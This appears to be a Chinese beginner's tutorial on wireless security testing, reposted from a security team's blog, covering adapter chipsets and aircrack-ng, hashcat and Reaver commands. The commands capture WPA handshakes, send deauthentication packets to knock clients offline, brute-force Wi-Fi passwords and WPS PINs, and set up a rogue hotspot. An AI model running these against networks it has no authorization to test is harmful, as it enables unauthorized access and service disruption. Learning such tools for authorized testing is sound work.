专栏首页ChaMd5安全团队小白也能玩转无线安全(一)——硬件&工具入门篇

小白也能玩转无线安全(一)——硬件&工具入门篇

小白也能玩转无线安全(一)——硬件&工具入门篇

From ChaMd5安全团队核心成员 sherlly

0x00 写在前面

很久之前就想出一套无线安全系列的文章,一方面,总结自己学习过程踏过的坑,另一方面,也算是和大家分享自己的学习心得,由于文章主要面向初学者,所以语言会比较浅显,文章有错误的或者是不足的地方希望大家指出,谢谢。

0x01 硬件选择

回想刚入门的时候,硬件这块不得不说是第一个坑了,网上给的建议大多参差不齐,也没有一个很好的标准,下面总结一下选择时考虑的因素:

  1. 无线网卡驱动必须支持监听模式(monitor);
  2. 选择网卡时注意功率大小,功率过小时接收包数量有限,探测范围也小,我个人用的是150Mbps;
  3. 驱动芯片要支持kali系统,而且特定的芯片对破解算法支持较好,下面整理了几款不错的芯片及对应无线网卡产品:

芯片型号

无线网卡

功率大小

价格参考(Amazon/Taobao)

Atheros AR9271

Alfa AWUS036NHA

150Mbps

$55.00/¥275+

TP-Link TL-WN722N

150Mbps

$13.71/¥100+

TP-Link TL-WN822N

300Mbps

$14.99/¥120+

Realtek RTL8187L

Alfa AWUS036H

1000MW

$34.99/¥60-200+

Ralink RT3070

Alfa AWUS036NH

2000MW

$39.99/¥160-255+

个人推荐TPLink的TL-WN722N,在旧版kali免装驱动完美识别,自带一根4dBi天线,可更换。当然,如果只是想尝尝鲜,完全可以去某宝买一个杂牌的,搜索时只搜索芯片型号就可以,如:AR9271

0x02 工具介绍

  • Aircrack-ng 套件 airmon-ng check kill //清理可能与aircrack-ng争用无线网卡的进程 airmon-ng start <interface> //无线网卡开启监听模式 airmon-ng stop <interface> //关闭无线网卡 airodump-ng <interface> //查看周围wifi热点 airodump-ng -c 6 --bssid AA:AA:AA:AA:AA:AA -w <save file> //抓取在频道6且bssid为AA:AA:AA:AA:AA:AA的路由器的握手包并保存 aireplay-ng <options> <replay interface> 常用: aireplay-ng -0 6 –a <ap mac> -c <device mac> <interface> //发送6个deauth(反认证)包强制断开目标设备的wifi连接 aircrack-ng -a2 -b AA:AA:AA:AA:AA:AA -w <dict file> <cap file> //a2表示类型为WPA的握手包,w后是爆破需要的字典文件,最后是已经捕捉到的握手包路径 aircrack-ng src.cap -J out.hccap //捕捉到的握手包.cap转换为.hccap,方便后续Hashcat破解 airbase-ng -e sherlly -c 6 <interface> //为网卡创建一个essid为'sherlly',频道为6的WiFi热点
    • airbase-ng:用于创建wifi热点
    • aircrack-ng:破解数据包密码
    • aireplay-ng:产生数据流量工具,通过多种攻击方式加速获取握手包
    • airodump-ng:查看无线网络并捕获802.11数据报文
    • airmon-ng:启动网卡的监听模式
  • Hashcat:一款支持GPU破解的密码破解神器 常用命令: hashcat64.exe -m 2500 -a3 sherllys.hccap ?d?d?d?d?d?d?d?d //破解密码为8位数字的握手包 hashcat64.exe -2 ?d?l -m 2500 -a3 sherlly.hccap ?2?2?2?2?2?2?2?2 //破解密码为8位数字加小写字母的握手包 hashcat64.exe -m 2500 sherlly.hccap pwd.txt //通过字典文件破解握手包 参数说明: 1. 暴力破解字符集选择: ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s ?b = 0x00 - 0xff
    • 老版本hashcat:只支持CPU破解
    • oclHashcat:支持显卡类型为AMD的GPU破解
    • cudaHashcat:支持显卡类型为NVIDIA的GPU破解
    1. 网络协议选择: 2500 = WPA/WPA2
    2. 攻击模式选择: 0 = Straight 1 = Combination 3 = Brute-force 6 = Hybrid dict + mask 7 = Hybrid mask + dict
  • Reaver:通过穷举pin码破解开启wps认证的路由 wash –i <interface> –C //探测开启wps认证的AP reaver -i <interface> -b AA:AA:AA:AA:AA:AA -vv //向bssid为AA:AA:AA:AA:AA:AA的AP发送Pin码

0x03 配置说明

1. 开启kali, 插上无线网卡,检测是否正常识别;

附:TPLINK-WN722N内置AR9271芯片,驱动型号是 ath9k_htc.

2.开启网卡监听模式,并记住设备接口名称,此处为wlan0mon:

3.开始扫描周围AP:

4.针对某一AP发起攻击:

(一)捕获802.11数据报文

(二)强制用户断开wifi重连

这一步是为了加速握手包的获得,注意需要另开终端执行,第一步的操作不要中断。

可以看到已经成功抓取握手包了。

5.关闭网卡监听模式

本文分享自微信公众号 - ChaMd5安全团队(chamd5sec),作者:sherlly

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-06-15

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CVE-2018-1111复现

    近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权...

    ChaMd5安全团队
  • php弱类型初级入门介绍

    0x00 前言 最近DeDeCMS爆出来一个前台任意用户密码重置漏洞,由于前台resetpassword.php中对接受的safequestion参数类型比较不...

    ChaMd5安全团队
  • CVE-2017-11882的复现、利用技巧以及修复方案

    0x00 前言 最新Office的CVE-2017-11882的poc刚刚发布出来,让人眼前一亮,完美无弹窗,无视宏,影响Ms offcie全版本,对于企业来说...

    ChaMd5安全团队
  • [Android][Framework] Gallery幻灯片流程以及一个Bitmap的bug

    用Camera录制任意长度视频。进入Gallery,打开包含刚拍好的视频的相册,然后右上角选择展示“幻灯片”,发现,刚才的视频的Thumbnail出现倾斜,被分...

    wOw
  • 对话 | 大疆:技术牛,就是这么任性

    对于一些非航模粉丝的人来说,认识航拍无人机是从大疆开始的;而认识大疆,则是从年终奖那一排奔驰开始的。过去三年,DJI的销售额神话般的增长80倍,成为电子行业最让...

    机器人网
  • 爬取IP代理偷偷给文章刷阅读量一、前言二、代码三、小结

    原本是想开始维护IP代理池,继续python爬虫进阶之路,但在看其他人写的IP代理爬取的文章时,发现可以把爬下来的IP用来给CSDN博客里的文章刷阅读量,于是就...

    古柳_DesertsX
  • 热火朝天的“人机大战”究竟有什么意义?

    数据猿导读 人机大战可以激发目前的创业者、学习者去了解更多全面的人工智能。比如在深度学习之外,学习蒙特卡洛等算法模型进行补充。AlphaGo给大家最大启发,不是...

    数据猿
  • Window 机制源码分析

    Window 是一个抽象的基类,表示一个窗口,包含一个View tree和layout参数。

    Yif
  • 有赞MySQL自动化运维之路—ZanDB

    一、前言 在互联网时代,业务规模常常出现爆发式的增长。快速的实例交付,数据库优化以及备份管理等任务都对DBA产生了更高的要求,单纯的凭借记忆力去管理那几十套DB...

    用户1263954
  • css笔记 - 张鑫旭css课程笔记

    xing.org1^

扫码关注云+社区

领取腾讯云代金券